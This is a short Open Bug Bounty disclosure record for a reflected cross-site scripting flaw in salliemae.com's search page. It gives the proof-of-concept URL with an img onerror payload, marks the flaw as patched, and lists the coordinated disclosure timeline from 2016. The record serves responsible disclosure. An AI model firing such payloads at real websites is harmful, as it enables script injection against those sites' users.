Vulnerable URL:
https://www.salliemae.com/search/?Ntt=%3Cimg%20src=x%20onerror=prompt%28/OPENBUGBOUNTY/%29%3E&Ntk=all_fields&N=0
Details:
Description | Value |
Patched: | Yes, at |
Vulnerability type: | XSS |
Vulnerability status: | Publicly disclosed |
Alexa Rank | 13916 |
VIP website status: | Yes |
Check salliemae.com SSL connection: | (Grade: A) |
Coordinated Disclosure Timeline:
Description | Value |
Vulnerability submitted via Open Bug Bounty | 30 August, 2016 11:58 GMT |
Generic security notifications sent to website owner | 30 August, 2016 12:00 GMT |
Notification sent to subscribers (without technical details) | 30 August, 2016 14:17 GMT |
Vulnerability details disclosed by researcher | 6 September, 2016 12:12 GMT |
Vulnerability patched by the website owner | 27 September, 2016 14:34 GMT |